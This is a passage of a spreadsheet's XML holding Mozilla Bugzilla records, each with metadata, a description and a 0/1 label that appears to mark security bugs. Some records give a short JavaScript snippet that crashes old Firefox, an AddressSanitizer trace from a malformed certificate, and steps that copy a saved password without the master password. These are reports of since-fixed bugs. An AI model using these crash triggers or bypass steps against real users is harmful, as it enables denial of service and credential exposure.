          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008111419 Gentoo Firefox/3.0.4
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008111419 Gentoo Firefox/3.0.4
using this simple javascript lines crash FF3.0.4:
var a = new Array(999);
a[6] = "toto";
a.splice(6, 1);
Reproducible: Always
Steps to Reproduce:
1) set a simple html document with the following code (intentionally left bare for brevity, bug occurs with proper doctype set, etc.)
======
&lt;html&gt;
&lt;body&gt;
&lt;script&gt;
var a = new Array(999);
a[6] = "toto";
a.splice(6, 1);
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
======
2) open the page in FF and wait
3) browser will crash within a few seconds
Actual Results:  
crash, sometimes with some delay of 5-10 seconds or more (!)
Expected Results:  
no crash
array should contain no element but have length 998
It seems the script does work before the crash, so I'm not sure what is going wrong. Adding an alert shows that the length has been updated, as expected:
var a = new Array(999);
a[6] = "toto";
a.splice(6, 1);
alert(a.length); // &lt;- shows 998, as expected
Crash happens on FF windows as well</t>
        </is>
      </c>
      <c r="X5605" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5606">
      <c r="A5606" t="n">
        <v>997795</v>
      </c>
      <c r="B5606" t="inlineStr">
        <is>
          <t>2014-04-17 08:44:02 -0700</t>
        </is>
      </c>
      <c r="C5606" t="inlineStr">
        <is>
          <t>###!!! ASSERTION: Unexpected non-ASCII character: '!(*s2 &amp; ~0x7F)', file ../../../dist/include/nsCharTraits.h, line 167</t>
        </is>
      </c>
      <c r="D5606" t="inlineStr">
        <is>
          <t>2016-06-04 15:33:08 -0700</t>
        </is>
      </c>
      <c r="E5606" t="n">
        <v>1</v>
      </c>
      <c r="F5606" t="n">
        <v>1</v>
      </c>
      <c r="G5606" t="n">
        <v>3</v>
      </c>
      <c r="H5606" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5606" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5606" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K5606" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5606" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5606" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5606" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5606" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5606" t="inlineStr">
        <is>
          <t>[adv-main31+]</t>
        </is>
      </c>
      <c r="Q5606" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5606" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5606" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T5606" t="n">
        <v>1</v>
      </c>
      <c r="U5606" t="n">
        <v>0</v>
      </c>
      <c r="V5606" t="n">
        <v>20</v>
      </c>
      <c r="W5606" t="inlineStr">
        <is>
          <t>Created attachment 8408322
test1.pem
The attached certificate causes the following failure (mozilla-central b735e618c2a8):
 0:03.18 [21808] ###!!! ASSERTION: Unexpected non-ASCII character: '!(*s2 &amp; ~0x7F)', file ../../../dist/include/nsCharTraits.h, line 167
 0:03.18 Hit MOZ_CRASH() at memory/mozalloc/mozalloc_abort.cpp:30
 0:03.18 ASAN:SIGSEGV
 0:03.18 =================================================================
 0:03.18 ==21808==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe6defea73a sp 0x7ffffa507820 bp 0x7ffffa507830 T0)
 0:03.20     #0 0x7fe6defea739 in mozalloc_abort(char const*) memory/mozalloc/mozalloc_abort.cpp:30
 0:04.74     #1 0x7fe6d2a306cd in Abort(char const*) xpcom/base/nsDebugImpl.cpp:421
 0:04.74     #2 0x7fe6d2a3039a in NS_DebugBreak xpcom/base/nsDebugImpl.cpp:408
 0:04.74     #3 0x7fe6d2a2d224 in nsCharTraits&lt;char16_t&gt;::copyASCII(char16_t*, char const*, unsigned long) objdir-ff-asan64dbg/xpcom/string/src/../../../dist/include/nsCharTraits.h:167
 0:04.74     #4 0x7fe6d2a20260 in nsAString_internal::AssignASCII(char const*, unsigned int, mozilla::fallible_t const&amp;) xpcom/string/src/nsTSubstring.cpp:351
 0:04.74     #5 0x7fe6d2a201da in nsAString_internal::AssignASCII(char const*, unsigned int) xpcom/string/src/nsTSubstring.cpp:332
 0:04.74     #6 0x7fe6d7fc6990 in nsAString_internal::AssignASCII(char const*) objdir-ff-asan64dbg/security/manager/ssl/src/../../../../dist/include/nsTSubstring.h:380
 0:04.74     #7 0x7fe6d7fc6990 in mozilla::RefPtr&lt;nsIX509Cert&gt;::operator nsIX509Cert*() const security/manager/ssl/src/TransportSecurityInfo.cpp:795
 0:04.74     #8 0x7fe6d7fc6990 in mozilla::psm::formatOverridableCertErrorMessage(nsISSLStatus&amp;, int, nsXPIDLCString const&amp;, int, bool, bool, nsString&amp;) security/manager/ssl/src/TransportSecurityInfo.cpp:1010
 0:04.74     #9 0x7fe6d7fc6990 in mozilla::psm::TransportSecurityInfo::formatErrorMessage(mozilla::BaseAutoLock&lt;mozilla::Mutex&gt; const&amp;, int, mozilla::psm::SSLErrorMessageType, bool, bool, nsString&amp;) security/manager/ssl/src/TransportSecurityInfo.cpp:249
 0:04.74     #10 0x7fe6d7fc8d23 in mozilla::psm::TransportSecurityInfo::GetErrorLogMessage(int, mozilla::psm::SSLErrorMessageType, nsString&amp;) security/manager/ssl/src/TransportSecurityInfo.cpp:209
 0:04.74     #11 0x7fe6d80012bf in mozilla::RefPtr&lt;mozilla::psm::TransportSecurityInfo&gt;::operator mozilla::psm::TransportSecurityInfo*() const security/manager/ssl/src/SSLServerCertVerification.cpp:223
 0:04.74     #12 0x7fe6d80012bf in mozilla::psm::(anonymous namespace)::CertErrorRunnable::CheckCertOverrides() security/manager/ssl/src/SSLServerCertVerification.cpp:536
 0:04.74     #13 0x7fe6d80012bf in mozilla::psm::(anonymous namespace)::CertErrorRunnable::RunOnTargetThread() security/manager/ssl/src/SSLServerCertVerification.cpp:548
 0:04.74     #14 0x7fe6d7fbcad1 in mozilla::psm::SyncRunnableBase::Run() security/manager/ssl/src/PSMRunnable.cpp:35
 0:04.74     #15 0x7fe6d2b5dff5 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:699
 0:04.75     #16 0x7fe6d2b7e2c9 in NS_InvokeByIndex xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
 0:04.75     #17 0x7fe6d56d85fe in CallMethodHelper::Invoke() js/xpconnect/src/XPCWrappedNative.cpp:2405
 0:04.75     #18 0x7fe6d56d85fe in CallMethodHelper::Call() js/xpconnect/src/XPCWrappedNative.cpp:1746
 0:04.75     #19 0x7fe6d569d45a in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) js/xpconnect/src/XPCWrappedNative.cpp:1713:12
 0:04.75     #20 0x7fe6d56a1f74 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1285
 0:04.75     #21 0x7fe6c412385b (+0x185b)
 0:04.75
 0:04.75 AddressSanitizer can not provide additional info.
 0:04.75 SUMMARY: AddressSanitizer: SEGV memory/mozalloc/mozalloc_abort.cpp:30 mozalloc_abort(char const*)
Marked s-s until investigated and confirmed to be harmless.</t>
        </is>
      </c>
      <c r="X5606" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5607">
      <c r="A5607" t="n">
        <v>601699</v>
      </c>
      <c r="B5607" t="inlineStr">
        <is>
          <t>2010-10-04 12:32:08 -0700</t>
        </is>
      </c>
      <c r="C5607" t="inlineStr">
        <is>
          <t>Crash [@ nsSVGPathElement::GetMarkPoints]</t>
        </is>
      </c>
      <c r="D5607" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:51 -0700</t>
        </is>
      </c>
      <c r="E5607" t="n">
        <v>1</v>
      </c>
      <c r="F5607" t="n">
        <v>1</v>
      </c>
      <c r="G5607" t="n">
        <v>3</v>
      </c>
      <c r="H5607" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5607" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5607" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K5607" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5607" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5607" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5607" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5607" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5607" t="inlineStr">
        <is>
          <t>[sg:critical?] [qa-needs-STR]</t>
        </is>
      </c>
      <c r="Q5607" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5607" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5607" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5607" t="n">
        <v>1</v>
      </c>
      <c r="U5607" t="n">
        <v>0</v>
      </c>
      <c r="V5607" t="n">
        <v>17</v>
      </c>
      <c r="W5607" t="inlineStr">
        <is>
          <t>Created attachment 480696
testcase (crashes Firefox when loaded)</t>
        </is>
      </c>
      <c r="X5607" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5608">
      <c r="A5608" t="n">
        <v>1565780</v>
      </c>
      <c r="B5608" t="inlineStr">
        <is>
          <t>2019-07-13 01:35:38 -0700</t>
        </is>
      </c>
      <c r="C5608" t="inlineStr">
        <is>
          <t>Ability to copy password from password manager without entering master password</t>
        </is>
      </c>
      <c r="D5608" t="inlineStr">
        <is>
          <t>2022-01-10 05:06:57 -0800</t>
        </is>
      </c>
      <c r="E5608" t="n">
        <v>1</v>
      </c>
      <c r="F5608" t="n">
        <v>1</v>
      </c>
      <c r="G5608" t="n">
        <v>3</v>
      </c>
      <c r="H5608" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5608" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J5608" t="inlineStr">
        <is>
          <t>Password Manager</t>
        </is>
      </c>
      <c r="K5608" t="inlineStr">
        <is>
          <t>68 Branch</t>
        </is>
      </c>
      <c r="L5608" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5608" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5608" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5608" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5608" t="inlineStr"/>
      <c r="Q5608" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5608" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5608" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T5608" t="n">
        <v>1</v>
      </c>
      <c r="U5608" t="n">
        <v>0</v>
      </c>
      <c r="V5608" t="n">
        <v>24</v>
      </c>
      <c r="W5608" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Steps to reproduce:
You must have some passwords saved in Firefox default credentials manager with a master password.
Start Firefox and enter your master password when prompted.
Then open the credentials dialog from the menu. You should see your credentials list.
Rich-click on one of the credentials, and try to copy the password in your clipboard.
Actual results:
You are prompted for your master password again. Close it without entering your master password, but the password is copied in your clipboard anyway.
Expected results:
Password should not have been copied in your clipboard since you did not enter the master password.</t>
        </is>
      </c>
      <c r="X5608" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5609">
      <c r="A5609" t="n">
        <v>1405599</v>
      </c>
      <c r="B5609" t="inlineStr">
        <is>
          <t>2017-10-04 02:20:42 -0700</t>
        </is>
      </c>
      <c r="C5609" t="inlineStr">
        <is>
          <t>Audio capture can start under wrong origin</t>
        </is>
      </c>
      <c r="D5609" t="inlineStr">
        <is>
          <t>2018-11-05 14:10:05 -0800</t>
        </is>
      </c>
      <c r="E5609" t="n">
        <v>1</v>
      </c>
      <c r="F5609" t="n">
        <v>1</v>
      </c>
      <c r="G5609" t="n">
        <v>3</v>
      </c>
      <c r="H5609" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5609" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5609" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K5609" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L5609" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5609" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5609" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5609" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5609" t="inlineStr">
        <is>
          <t>[adv-main58+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5609" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5609" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5609" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T5609" t="n">
        <v>1</v>
      </c>
      <c r="U5609" t="n">
        <v>0</v>
      </c>
      <c r="V5609" t="n">
        <v>32</v>
      </c>
      <c r="W5609" t="inlineStr">
        <is>
          <t>Created attachment 8915061
test.html
Found while investigating bug 1403186.
STR:
1 host test.html locally with e.g., `python -m SimpleHTTPServer`
2 `MOZ_LOG=timestamp,MediaManager:5 ./mach run localhost:8000/test.hml`
Expected:
No gUM permission prompt
Actual:
gUM permission prompt that asks for permission for audio capture for "mozilla.github.io". Also, clicking "Allow" results in starting audio capture.
I have not been able to circumvent the permission prompt. So storing a persistent permission for https://mozilla.github.io still results in a prompt.
I have not been able to start video capture this way. There is a guard at [1] which is probably what is catching this.
I am not sure whether one can do anything with the audio. It cannot be ruled out.
The captured audio stops after a while, presumable because GC collects the track. I have not investigated persisting the capture for longer.
[1] http://searchfox.org/mozilla-central/rev/e62604a97286f49993eb29c493672c17c7398da9/dom/media/systemservices/CamerasParent.cpp#640</t>
        </is>
      </c>
      <c r="X5609" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5610">
      <c r="A5610" t="n">
        <v>810400</v>
      </c>
      <c r="B5610" t="inlineStr">
        <is>
          <t>2012-11-09 10:50:46 -0800</t>
        </is>
      </c>
      <c r="C5610" t="inlineStr">
        <is>
          <t>release runner should notify on error / slowness</t>
        </is>
      </c>
      <c r="D5610" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:47 -0700</t>
        </is>
      </c>
      <c r="E5610" t="n">
        <v>1</v>
      </c>
      <c r="F5610" t="n">
        <v>1</v>
      </c>
      <c r="G5610" t="n">
        <v>5</v>
      </c>
      <c r="H5610" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5610" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5610" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K5610" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5610" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5610" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5610" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5610" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5610" t="inlineStr">
        <is>
          <t>[shipit]</t>
        </is>
      </c>
      <c r="Q5610" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5610" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5610" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5610" t="n">
        <v>1</v>
      </c>
      <c r="U5610" t="n">
        <v>0</v>
      </c>
      <c r="V5610" t="n">
        <v>2</v>
      </c>
      <c r="W5610" t="inlineStr">
        <is>
          <t>For example, when release sanity fails it should e-mail the group with the details. Or when reconfigs take a long time. Or when configs fail to bump, etc.</t>
        </is>
      </c>
      <c r="X5610" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5611">
      <c r="A5611" t="n">
        <v>1392078</v>
      </c>
      <c r="B5611" t="inlineStr">
        <is>
          <t>2017-08-20 05:02:47 -0700</t>
        </is>
      </c>
      <c r="C5611" t="inlineStr">
        <is>
          <t>Crash in java.lang.IllegalStateException: Decremented incorrect number of change counters at org.mozilla.gecko.sync.repositories.VersioningDelegateHelper.persistSyncVersions(VersioningDelegateHelper.java)</t>
        </is>
      </c>
      <c r="D5611" t="inlineStr">
        <is>
          <t>2020-12-21 10:30:39 -0800</t>
        </is>
      </c>
      <c r="E5611" t="n">
        <v>1</v>
      </c>
      <c r="F5611" t="n">
        <v>1</v>
      </c>
      <c r="G5611" t="n">
        <v>6</v>
      </c>
      <c r="H5611" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5611" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5611" t="inlineStr">
        <is>
          <t>Android Sync</t>
        </is>
      </c>
      <c r="K5611" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5611" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5611" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5611" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5611" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5611" t="inlineStr">
        <is>
          <t>[clouseau]</t>
        </is>
      </c>
      <c r="Q5611" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5611" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5611" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T5611" t="n">
        <v>1</v>
      </c>
      <c r="U5611" t="n">
        <v>0</v>
      </c>
      <c r="V5611" t="n">
        <v>15</v>
      </c>
      <c r="W5611" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-650cfd84-d609-4634-9c63-a37440170820.
=============================================================
There are 1241 crashes in nightly 57 starting with buildid 20170818100308. In analyzing the backtrace, the regression may have been introduced by patch [1] to fix bug 1364644.
The signature is ranked #1 in nightly FennecAndroid top-crashers.
[1] https://hg.mozilla.org/mozilla-central/rev/517c934fdec5</t>
        </is>
      </c>
      <c r="X5611" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5612">
      <c r="A5612" t="n">
        <v>1243473</v>
      </c>
      <c r="B5612" t="inlineStr">
        <is>
          <t>2016-01-27 10:57:27 -0800</t>
        </is>
      </c>
      <c r="C5612" t="inlineStr">
        <is>
          <t>graphite2: heap-buffer-overflow read in [@graphite2::GlyphCache::glyph]</t>
        </is>
      </c>
      <c r="D5612" t="inlineStr">
        <is>
          <t>2016-09-22 14:48:17 -0700</t>
        </is>
      </c>
      <c r="E5612" t="n">
        <v>1</v>
      </c>
      <c r="F5612" t="n">
        <v>1</v>
      </c>
      <c r="G5612" t="n">
        <v>3</v>
      </c>
      <c r="H5612" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5612" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5612" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K5612" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5612" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5612" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5612" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5612" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5612" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q5612" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5612" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5612" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5612" t="n">
        <v>1</v>
      </c>
      <c r="U5612" t="n">
        <v>0</v>
      </c>
      <c r="V5612" t="n">
        <v>8</v>
      </c>
      <c r="W5612" t="inlineStr">
        <is>
          <t>Created attachment 8712779
call_stack.txt
This was found while fuzzing graphite2 1.3.5 (and is in 1.3.4)</t>
        </is>
      </c>
      <c r="X5612" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5613">
      <c r="A5613" t="n">
        <v>625978</v>
      </c>
      <c r="B5613" t="inlineStr">
        <is>
          <t>2011-01-14 17:15:57 -0800</t>
        </is>
      </c>
      <c r="C5613" t="inlineStr">
        <is>
          <t>flapping nagios alerts for builds-running, builds-pending</t>
        </is>
      </c>
      <c r="D5613" t="inlineStr">
        <is>
          <t>2013-10-13 16:05:53 -0700</t>
        </is>
      </c>
      <c r="E5613" t="n">
        <v>1</v>
      </c>
      <c r="F5613" t="n">
        <v>1</v>
      </c>
      <c r="G5613" t="n">
        <v>5</v>
      </c>
      <c r="H5613" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5613" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5613" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5613" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5613" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5613" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5613" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5613" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5613" t="inlineStr"/>
      <c r="Q5613" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5613" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5613" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5613" t="n">
        <v>1</v>
      </c>
      <c r="U5613" t="n">
        <v>0</v>
      </c>
      <c r="V5613" t="n">
        <v>12</v>
      </c>
      <c r="W5613" t="inlineStr">
        <is>
          <t>Not sure whats causing this flapping alert, filing to track fixing root cause. Leaving in RelEng until we figure out what needs fixing.
16:38:45 &lt; nagios&gt; [19] dm-wwwbuild01:http_age - builds-running is CRITICAL: HTTP CRITICAL: 
                   HTTP/1.1 200 OK - Last modified 0:09:30 ago - 138425 bytes in 0.009 second 
                   response time
16:38:45 &lt; nagios&gt; [20] dm-wwwbuild01:http_age - builds-pending is CRITICAL: HTTP CRITICAL: 
                   HTTP/1.1 200 OK - Last modified 0:09:29 ago - 148134 bytes in 0.011 second 
                   response time
16:41:47 &lt; nagios&gt; dm-wwwbuild01:http_age - builds-running is OK: HTTP OK: HTTP/1.1 200 OK - 
                   131430 bytes in 0.011 second response time
16:41:47 &lt; nagios&gt; dm-wwwbuild01:http_age - builds-pending is OK: HTTP OK: HTTP/1.1 200 OK - 
                   143845 bytes in 0.013 second response time
16:58:43 &lt; nagios&gt; [29] dm-wwwbuild01:http_age - builds-pending is CRITICAL: HTTP CRITICAL: 
                   HTTP/1.1 200 OK - Last modified 0:09:17 ago - 148940 bytes in 0.009 second 
                   response time
16:58:43 &lt; nagios&gt; [30] dm-wwwbuild01:http_age - builds-running is CRITICAL: HTTP CRITICAL: 
                   HTTP/1.1 200 OK - Last modified 0:09:19 ago - 132278 bytes in 0.007 second 
                   response time
17:01:46 &lt; nagios&gt; dm-wwwbuild01:http_age - builds-running is OK: HTTP OK: HTTP/1.1 200 OK - 
                   127032 bytes in 0.008 second response time
17:01:46 &lt; nagios&gt; dm-wwwbuild01:http_age - builds-pending is OK: HTTP OK: HTTP/1.1 200 OK - 
                   144640 bytes in 0.009 second response time</t>
        </is>
      </c>
      <c r="X5613" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5614">
      <c r="A5614" t="n">
        <v>859873</v>
      </c>
      <c r="B5614" t="inlineStr">
        <is>
          <t>2013-04-09 09:45:25 -0700</t>
        </is>
      </c>
      <c r="C5614" t="inlineStr">
        <is>
          <t>Trychooser production push for 642fa41fca36</t>
        </is>
      </c>
      <c r="D5614" t="inlineStr">
        <is>
          <t>2017-05-08 09:48:46 -0700</t>
        </is>
      </c>
      <c r="E5614" t="n">
        <v>1</v>
      </c>
      <c r="F5614" t="n">
        <v>1</v>
      </c>
      <c r="G5614" t="n">
        <v>5</v>
      </c>
      <c r="H5614" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5614" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5614" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5614" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5614" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5614" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5614" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5614" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5614" t="inlineStr"/>
      <c r="Q5614" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5614" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5614" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5614" t="n">
        <v>1</v>
      </c>
      <c r="U5614" t="n">
        <v>0</v>
      </c>
      <c r="V5614" t="n">
        <v>2</v>
      </c>
      <c r="W5614" t="inlineStr">
        <is>
          <t>Can you push at least 642fa41fca36 to production for bug 855591?
Thanks</t>
        </is>
      </c>
      <c r="X5614" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5615">
      <c r="A5615" t="n">
        <v>435905</v>
      </c>
      <c r="B5615" t="inlineStr">
        <is>
          <t>2008-05-27 10:19:02 -0700</t>
        </is>
      </c>
      <c r="C5615" t="inlineStr">
        <is>
          <t>move qm-centos5-03 to mozilla2 unittest</t>
        </is>
      </c>
      <c r="D5615" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5615" t="n">
        <v>1</v>
      </c>
      <c r="F5615" t="n">
        <v>1</v>
      </c>
      <c r="G5615" t="n">
        <v>5</v>
      </c>
      <c r="H5615" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5615" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5615" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5615" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5615" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5615" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5615" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5615" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5615" t="inlineStr"/>
      <c r="Q5615" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5615" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5615" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5615" t="n">
        <v>1</v>
      </c>
      <c r="U5615" t="n">
        <v>0</v>
      </c>
      <c r="V5615" t="n">
        <v>8</v>
      </c>
      <c r="W5615" t="inlineStr">
        <is>
          <t>As discussed in a meeting today, we're going to try cloning qm-centos5-03 and installing it on mozilla2 unittest.
Steps to be done:
0. create cltbld user
1. upgrade python,
2. upgrade twisted,
3. upgrade buildbot
according to reference platform documents.
http://wiki.mozilla.org/ReferencePlatforms/Linux-CentOS-5.0
4. add builder to master config
5. create and connect slave</t>
        </is>
      </c>
      <c r="X5615" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5616">
      <c r="A5616" t="n">
        <v>21459</v>
      </c>
      <c r="B5616" t="inlineStr">
        <is>
          <t>1999-12-10 16:15:30 -0800</t>
        </is>
      </c>
      <c r="C5616" t="inlineStr">
        <is>
          <t>[DOGFOOD] Can not submit form onLoad event.</t>
        </is>
      </c>
      <c r="D5616" t="inlineStr">
        <is>
          <t>2019-03-13 06:46:04 -0700</t>
        </is>
      </c>
      <c r="E5616" t="n">
        <v>1</v>
      </c>
      <c r="F5616" t="n">
        <v>1</v>
